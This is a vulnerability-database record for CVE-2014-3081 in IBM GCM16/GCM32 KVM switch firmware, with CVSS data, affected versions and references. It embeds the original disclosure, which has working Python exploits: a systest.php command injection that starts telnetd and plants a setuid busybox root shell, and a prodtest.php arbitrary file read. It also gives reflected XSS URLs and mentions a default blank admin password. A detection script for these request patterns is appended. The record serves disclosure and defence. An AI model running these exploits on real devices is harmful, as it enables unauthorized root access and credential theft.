ID

VAR-201408-0280


CVE

CVE-2014-3081


TITLE

IBM GCM16 and GCM32 Global Console Manager Switch firmware prodtest.php Vulnerable to reading arbitrary files

Trust: 0.8

sources: JVNDB: JVNDB-2014-003832

DESCRIPTION

prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter. An attacker can exploit this issue to read arbitrary files in the context of the user running the application. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access.

*Product description*
The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerable. Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received.

*1. Remote code execution*
CVEID: CVE-2014-2085
Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch.
PoC of this vulnerability:

```python
#!/usr/bin/python
# Python 2 (StringIO module, print statement)
"""
Exploit for Avocent KVM switch v1.20.0.22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId) is necessary for this to work, so you need a valid user.
Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target (pass: target)
then do "/tmp/su -" to gain root (password "root")
alex.a.bravo@gmail.com
"""
from StringIO import StringIO
import pycurl
import os

sessid = "1111111111"
target = "192.168.0.10"
durl = "https://" + target + "/systest.php?lpres=;%20/usr/sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%206755%20/tmp/su%20;"
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER, 0)
c.setopt(c.SSL_VERIFYHOST, 0)
c.setopt(c.WRITEFUNCTION, storage.write)
c.setopt(c.COOKIE, 'avctSessionId=' + sessid)
try:
    print "[*] Sending GET to " + target + " with session id " + sessid + "..."
    c.perform()
    c.close()
except:
    print ""
finally:
    print "[*] Done"
print "[*] Trying telnet..."
print "[*] Login as target/target, then do /tmp/su - and enter password \"root\""
os.system("telnet " + target)
```

*2.

```python
# Python 2 (StringIO module, print statement)
"""
Files can be anywhere on the target.
SessionId (avctSessionId) is necessary for this to work, so you need a valid user.
alex.a.bravo@gmail.com
"""
from StringIO import StringIO
import pycurl

sessid = "1111111111"
target = "192.168.0.10"
file = "/etc/IBM_user.dat"
durl = "https://" + target + "/prodtest.php?engage=video_bits&display=results&filename=" + file
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER, 0)
c.setopt(c.SSL_VERIFYHOST, 0)
c.setopt(c.WRITEFUNCTION, storage.write)
c.setopt(c.COOKIE, 'avctSessionId=' + sessid)
try:
    c.perform()
    c.close()
except:
    print ""
content = storage.getvalue()
print content.replace("<td>", "").replace("</td>", "")
```

*3. Cross site scripting non-persistent*
CVEID: CVE-2014-3080
Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
Examples:
http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E

*Vendor Response:*
IBM release 1.20.20.23447 firmware

*Timeline:*
2014-05-20 - Vendor (PSIRT) notified
2014-05-21 - Vendor assigns internal ID
2014-07-16 - Patch Disclosed
2014-07-17 - Vulnerability disclosed

*External Information:*
Info about the vulnerability (spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html
IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983

--
Alejandro Alvarez Bravo
alex.a.bravo@gmail.com
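Detection logic for the three request patterns the advisory describes, as an added example that is not part of this record or of the advisory: it scans web-server access-log lines for prodtest.php requests whose filename parameter is absolute or traverses upward, systest.php requests with shell metacharacters in lpres, and script tags aimed at kvm.cgi or avctalert.php. The log lines, the finding labels and the regexes are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not taken from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jul/2014:10:01:02 +0000] "GET /prodtest.php?engage=video_bits&display=results&filename=/etc/IBM_user.dat HTTP/1.1" 200 512
10.0.0.5 - - [17/Jul/2014:10:01:09 +0000] "GET /systest.php?lpres=;%20ls HTTP/1.1" 200 88
10.0.0.9 - - [17/Jul/2014:10:02:30 +0000] "GET /kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E HTTP/1.1" 200 1201
10.0.0.7 - - [17/Jul/2014:10:03:00 +0000] "GET /login.php HTTP/1.1" 200 3055
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')   # request target inside the quoted request line
SHELL_META = re.compile(r'[;|&`$]')                       # characters that split or chain shell commands
SCRIPT_TAG = re.compile(r'<\s*script', re.IGNORECASE)     # reflected-XSS marker after URL decoding

def classify_request(target):
    """Return a finding label for one request target, or None when nothing matches."""
    parts = urlsplit(target)
    path = parts.path.lower()
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes each value
    decoded_query = unquote(parts.query)
    if path.endswith('/prodtest.php') and 'filename' in params:
        fname = params['filename'][0]
        if fname.startswith('/') or '..' in fname:
            return 'CVE-2014-3081 arbitrary file read attempt'
    if path.endswith('/systest.php') and 'lpres' in params:
        if SHELL_META.search(params['lpres'][0]):
            return 'CVE-2014-2085 command injection attempt'
    if path.endswith(('/kvm.cgi', '/avctalert.php')) and SCRIPT_TAG.search(decoded_query):
        return 'CVE-2014-3080 reflected XSS attempt'
    return None

def scan_log(text):
    """Return a list of (client_ip, label, target) for every suspicious log line."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        label = classify_request(m.group(1))
        if label:
            findings.append((line.split()[0], label, m.group(1)))
    return findings

if __name__ == '__main__':
    for ip, label, target in scan_log(SAMPLE_LOG):
        print(f'{ip}: {label} ({target})')
```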

Trust: 2.07

sources: NVD: CVE-2014-3081 // JVNDB: JVNDB-2014-003832 // BID: 68779 // VULHUB: VHN-71020 // PACKETSTORM: 127543

AFFECTED PRODUCTS

vendor: ibm | model: global console manager 32 | scope: lte | version: 1.20.0.22575

Trust: 1.0

vendor: ibm | model: global console manager 16 | scope: lte | version: 1.20.0.22575

Trust: 1.0

vendor: ibm | model: 1754 gcm16 global console manager | scope: lt | version: 1.20.20.23447

Trust: 0.8

vendor: ibm | model: 1754 gcm32 global console manager | scope: lt | version: 1.20.20.23447

Trust: 0.8

vendor: ibm | model: global console manager 16 | scope: eq | version: 1.20.0.22575

Trust: 0.6

vendor: ibm | model: global console manager 32 | scope: eq | version: 1.20.0.22575

Trust: 0.6

sources: JVNDB: JVNDB-2014-003832 // CNNVD: CNNVD-201407-676 // NVD: CVE-2014-3081

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2014-3081
value: MEDIUM

Trust: 1.0

NVD: CVE-2014-3081
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201407-676
value: MEDIUM

Trust: 0.6

VULHUB: VHN-71020
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2014-3081
severity: MEDIUM
baseScore: 6.3
vectorString: AV:N/AC:M/AU:S/C:C/I:N/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: COMPLETE
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-71020
severity: MEDIUM
baseScore: 6.3
vectorString: AV:N/AC:M/AU:S/C:C/I:N/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: COMPLETE
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-71020 // JVNDB: JVNDB-2014-003832 // CNNVD: CNNVD-201407-676 // NVD: CVE-2014-3081

PROBLEMTYPE DATA

problemtype:CWE-200

Trust: 1.9

sources: VULHUB: VHN-71020 // JVNDB: JVNDB-2014-003832 // NVD: CVE-2014-3081

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201407-676

TYPE

information disclosure

Trust: 0.6

sources: CNNVD: CNNVD-201407-676

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-003832

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-71020

PATCH

title: MIGR-5095983 | url: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983

Trust: 0.8

sources: JVNDB: JVNDB-2014-003832

EXTERNAL IDS

db: NVD | id: CVE-2014-3081

Trust: 2.9

db: EXPLOIT-DB | id: 34132

Trust: 1.7

db: PACKETSTORM | id: 127543

Trust: 1.2

db: BID | id: 68779

Trust: 1.0

db: JVNDB | id: JVNDB-2014-003832

Trust: 0.8

db: CNNVD | id: CNNVD-201407-676

Trust: 0.7

db: SECUNIA | id: 60260

Trust: 0.6

db: XF | id: 93930

Trust: 0.6

db: VULHUB | id: VHN-71020

Trust: 0.1

sources: VULHUB: VHN-71020 // BID: 68779 // JVNDB: JVNDB-2014-003832 // PACKETSTORM: 127543 // CNNVD: CNNVD-201407-676 // NVD: CVE-2014-3081

REFERENCES

url:http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983

Trust: 1.7

url:http://www.exploit-db.com/exploits/34132/

Trust: 1.7

url:http://seclists.org/fulldisclosure/2014/jul/113

Trust: 1.1

url:http://packetstormsecurity.com/files/127543/ibm-1754-gcm-kvm-code-execution-file-read-xss.html

Trust: 1.1

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/93930

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3081

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3081

Trust: 0.8

url:http://xforce.iss.net/xforce/xfdb/93930

Trust: 0.6

url:http://secunia.com/advisories/60260

Trust: 0.6

url:http://www.securityfocus.com/bid/68779

Trust: 0.6

url:http://kvm/kvm.cgi?%3cscript%3ealert%28%22aaa%22%29%3c/script%3e

Trust: 0.1

url:http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html

Trust: 0.1

url:https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3cscript%3ealert%28%22aaa%22%29%3c/script%3e

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-2085

Trust: 0.1

url:http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-3080

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-3081

Trust: 0.1

sources: VULHUB: VHN-71020 // JVNDB: JVNDB-2014-003832 // PACKETSTORM: 127543 // CNNVD: CNNVD-201407-676 // NVD: CVE-2014-3081

CREDITS

Alejandro Alvarez Bravo

Trust: 1.0

sources: BID: 68779 // PACKETSTORM: 127543 // CNNVD: CNNVD-201407-676

SOURCES

db: VULHUB | id: VHN-71020
db: BID | id: 68779
db: JVNDB | id: JVNDB-2014-003832
db: PACKETSTORM | id: 127543
db: CNNVD | id: CNNVD-201407-676
db: NVD | id: CVE-2014-3081

LAST UPDATE DATE

2025-04-13T23:05:08.333000+00:00


SOURCES UPDATE DATE

db: VULHUB | id: VHN-71020 | date: 2017-08-29T00:00:00
db: BID | id: 68779 | date: 2014-07-22T06:39:00
db: JVNDB | id: JVNDB-2014-003832 | date: 2014-08-26T00:00:00
db: CNNVD | id: CNNVD-201407-676 | date: 2014-08-18T00:00:00
db: NVD | id: CVE-2014-3081 | date: 2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db: VULHUB | id: VHN-71020 | date: 2014-08-17T00:00:00
db: BID | id: 68779 | date: 2014-07-14T00:00:00
db: JVNDB | id: JVNDB-2014-003832 | date: 2014-08-19T00:00:00
db: PACKETSTORM | id: 127543 | date: 2014-07-21T19:57:35
db: CNNVD | id: CNNVD-201407-676 | date: 2014-07-29T00:00:00
db: NVD | id: CVE-2014-3081 | date: 2014-08-17T23:55:06.887